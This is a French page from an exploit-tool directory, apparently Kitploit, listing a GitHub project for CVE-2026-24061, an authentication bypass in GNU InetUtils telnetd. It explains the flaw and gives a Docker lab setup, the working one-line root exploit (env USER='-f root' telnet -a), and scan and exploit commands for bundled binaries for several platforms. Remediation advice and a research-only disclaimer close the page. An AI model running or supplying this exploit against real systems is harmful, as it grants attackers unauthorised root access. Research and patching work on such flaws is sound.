Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — Exploit et scanner pour CVE-2026-24061, un contournement d'authentification telnetd qui accorde un shell root via une variable d'environnement USER spécialement conçue. Inclut la configuration de l'environnement Docker et des binaires d'exploit multiplateformes. | Kitploit
Outils/GitHubGitHub/parad0x7e/cve-2026-24061
Analyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionAuthentificationOutil d'Accès à Distance
GitHubparad0x7e/cve-2026-24061

CVE-2026-24061

Exploit et scanner pour CVE-2026-24061, un contournement d'authentification telnetd qui accorde un shell root via une variable d'environnement USER spécialement conçue. Inclut la configuration de l'environnement Docker et des binaires d'exploit multiplateformes.

Voir le dépôt
8il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24061 : Vulnérabilité de contournement d'authentification dans telnetd

CVE-2026-24061 est une vulnérabilité de contournement d'authentification dans telnetd qui permet à des attaquants de contourner la vérification d'identité via des combinaisons spécifiques de variables d'environnement et d'obtenir directement un shell avec privilèges root.

Il existe une faille dans la logique d'authentification de telnetd. Lors de l'utilisation de l'option -a (connexion automatique) combinée à une variable d'environnement USER spécifique (telle que -f root), il est possible de contourner le processus d'authentification normal et de se connecter directement en tant qu'utilisateur root.

Introduction

GNU InetUtils est une collection d'outils réseau de base du projet GNU. Elle contient de nombreux clients et démons réseau traditionnels, tels que ftp, telnet, rsh, rlogin, , etc., fournissant une bibliothèque complète de composants réseau au style GNU. est le programme serveur de cette boîte à outils chargé de gérer les requêtes de connexion Telnet entrantes, dont la tâche principale est de fournir aux utilisateurs distants une interface terminal interactive (généralement un Shell).

tftp
telnetd

Fonctionnement

  1. Généralement surveillé par inetd ou xinetd sur le port 23. Lorsqu'une requête arrive, telnetd est démarré.
  2. Gère la négociation des options spécifiques au protocole Telnet (telles que le type de terminal, la taille de la fenêtre, le jeu de caractères, etc.).
  3. Appelle généralement le programme login sous-jacent du système pour vérifier le nom d'utilisateur et le mot de passe.
  4. Après une connexion réussie, il alloue un pseudo-terminal à l'utilisateur et démarre le Shell spécifié.

Références

  • https://github.com/yanxinwu946/CVE-2026-24061--telnetd
  • https://github.com/vulhub/vulhub/
  • https://forum.butian.net/share/4766

Configuration de l'environnement

Tout d'abord, téléchargez ce dépôt localement. La structure du répertoire est la suivante :

Dans ce répertoire, exécutez la commande suivante pour démarrer l'environnement vulnérable pour CVE-2026-24061 :

root@kitploit:~
docker compose up -d --build

Après le démarrage, le service telnet s'exécutera sur 0.0.0.0:2323

Principe de la vulnérabilité

  1. L'option -a de telnetd est utilisée pour activer la fonctionnalité de connexion automatique
  2. Lorsque -a est activé, telnetd lit la variable d'environnement USER comme nom d'utilisateur de connexion
  3. Si la variable d'environnement USER est définie sur -f root, telnetd interprète incorrectement -f comme un indicateur d'option et root comme l'utilisateur cible
  4. Cela entraîne le contournement du contrôle d'authentification, établissant une session directement en tant qu'utilisateur root

Exploitation de la vulnérabilité

Exploitation manuelle

root@kitploit:~
# Définir la variable d'environnement USER et se connecter avec telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323

En cas de succès, vous obtiendrez un shell interactif avec les privilèges root :

Exploitation à l'aide d'un outil

root@kitploit:~
cd exp

Vous pouvez voir trois fichiers : exp, exp_darwin et exp.exe sont respectivement les exécutables pour Linux, Mac et Windows. Choisissez celui dont vous avez besoin. Le code source de l'outil est également fourni. Si vous avez besoin d'autres versions, vous pouvez les compiler vous-même. J'utilise ici exp pour Linux, qui dispose d'informations d'aide détaillées.

Détecter si la vulnérabilité existe (analyse par défaut du port 23) :

root@kitploit:~
./exp -mode scan -target your-ip -port your-port

Exploiter la vulnérabilité et obtenir un shell :

root@kitploit:~
./exp -mode exploit -target your-ip -port your-port

Comment corriger

  1. Mettre à niveau inetutils-telnetd vers la dernière version
  2. Désactiver le service telnet dans l'environnement de production et utiliser SSH à la place
  3. Déployer le service telnet dans un environnement réseau interne isolé
  4. Utiliser un pare-feu pour restreindre la source d'accès au service telnet

Avertissement

Ce projet est destiné uniquement à la recherche en sécurité et à des fins éducatives. Ne l'utilisez pas sur des systèmes non autorisés. Les utilisateurs assument l'entière responsabilité légale de toute conséquence résultant de l'utilisation de cet outil.

Télécharger l’outil